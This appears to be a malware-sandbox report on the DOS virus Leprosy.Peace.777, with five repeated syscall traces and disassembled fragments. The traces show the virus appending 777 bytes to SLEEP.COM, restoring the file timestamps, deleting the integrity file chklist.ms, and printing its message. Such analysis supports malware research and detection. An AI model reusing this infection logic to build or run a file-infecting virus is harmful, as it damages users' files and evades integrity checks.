Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Peace.777

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:17:16.609929264Z 78 PC: 12b5d | Find first file
2018-12-17T22:17:16.615184169Z 42 PC: 12b6f | Get date
0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-17T22:17:16.618229592Z 78 PC: 12b87 | Find first file
2018-12-17T22:17:16.624139042Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:17:16.63058238Z 87 PC: 12ba4 | Get or set file date and time
2018-12-17T22:17:16.632909851Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-17T22:17:16.64766226Z 87 PC: 12be4 | Get or set file date and time
2018-12-17T22:17:16.649614992Z 62 PC: 12bc1 | Close file
2018-12-17T22:17:16.658263058Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:17:16.667200847Z 44 PC: 12c0c | Get time
0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-17T22:17:16.669655577Z 9 PC: 12c1c | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-17T22:17:16.678898235Z 76 PC: 12c20 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:02.601934507Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:02.6093985Z 42 PC: 12b6f | Get date
0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:02.611804755Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:02.618577376Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:02.626728045Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:02.629269327Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:02.644541901Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:02.646360904Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:02.658145605Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:02.664709447Z 44 PC: 12c0c | Get time
0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:02.667110176Z 76 PC: 12c15 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:03.263814847Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:03.269466104Z 42 PC: 12b6f | Get date
0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:03.271504115Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:03.277228585Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:03.283872184Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:03.285145378Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:03.305209527Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:03.307223322Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:03.314849037Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:03.320882761Z 44 PC: 12c0c | Get time
0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:03.323966925Z 76 PC: 12c15 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:03.453508336Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:03.467605698Z 42 PC: 12b6f | Get date
0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:03.469709834Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:03.477831054Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:03.484462732Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:03.486139679Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:03.49957937Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:03.502501843Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:03.509825883Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:03.515649182Z 44 PC: 12c0c | Get time
0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:03.51811213Z 9 PC: 12c1c | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-25T11:48:03.524307772Z 76 PC: 12c20 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":3033,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:08.026582376Z 78 PC: 12b5d | Find first file
2018-12-25T11:48:08.033450649Z 42 PC: 12b6f | Get date
0x12b6f: cmp dh, 0xc
0x12b72: jne 0x12b7c
0x12b74: cmp dl, 5
0x12b77: jne 0x12b7c
0x12b79: jmp 0x12bf3
0x12b7c: mov ah, 0x4e
0x12b7e: mov dx, 0x11a
0x12b81: add dx, si
0x12b83: xor cx, cx
0x12b85: int 0x21
0x12b87: jb 0x12bc2
0x12b89: mov ax, 0x3d02
0x12b8c: mov dx, 0x9e
0x12b8f: int 0x21
0x12b91: cmp dx, 0x10e
0x12b95: je 0x12bb4
0x12b97: mov word ptr [si + 0x1fe], ax
0x12b9b: mov ax, 0x5700
0x12b9e: mov bx, word ptr [si + 0x1fe]
0x12ba2: int 0x21
2018-12-25T11:48:08.039413131Z 78 PC: 12b87 | Find first file
2018-12-25T11:48:08.045897661Z 61 PC: 12b91 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:08.053622759Z 87 PC: 12ba4 | Get or set file date and time
2018-12-25T11:48:08.055467097Z 64 PC: 12bdc | Write file or device (Write 777 bytes on handle 5)
2018-12-25T11:48:09.217613831Z 87 PC: 12be4 | Get or set file date and time
2018-12-25T11:48:09.222789089Z 62 PC: 12bc1 | Close file
2018-12-25T11:48:09.237339279Z 65 PC: 12bf0 | Delete file (Filename = 'chklist.ms')
2018-12-25T11:48:09.244628209Z 44 PC: 12c0c | Get time
0x12c0c: cmp dh, 0x1e
0x12c0f: jg 0x12c15
0x12c11: mov ah, 0x4c
0x12c13: int 0x21
0x12c15: mov ah, 9
0x12c17: mov dx, 0x1cc
0x12c1a: int 0x21
0x12c1c: mov ah, 0x4c
0x12c1e: int 0x21
0x12c20: mov ah, 0x4c
0x12c22: int 0x21
0x12c24: xor ax, 0xb4
0x12c27: mov cl, 4
0x12c29: shl ax, cl
0x12c2b: mov dl, byte ptr [0x355f]
0x12c2f: mov dh, 0
0x12c31: or ax, dx
0x12c33: mov cl, 8
0x12c35: shl ax, cl
0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T11:48:09.247606304Z 9 PC: 12c1c | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-25T11:48:09.255791461Z 76 PC: 12c20 | Terminate with return code (Return code = '36')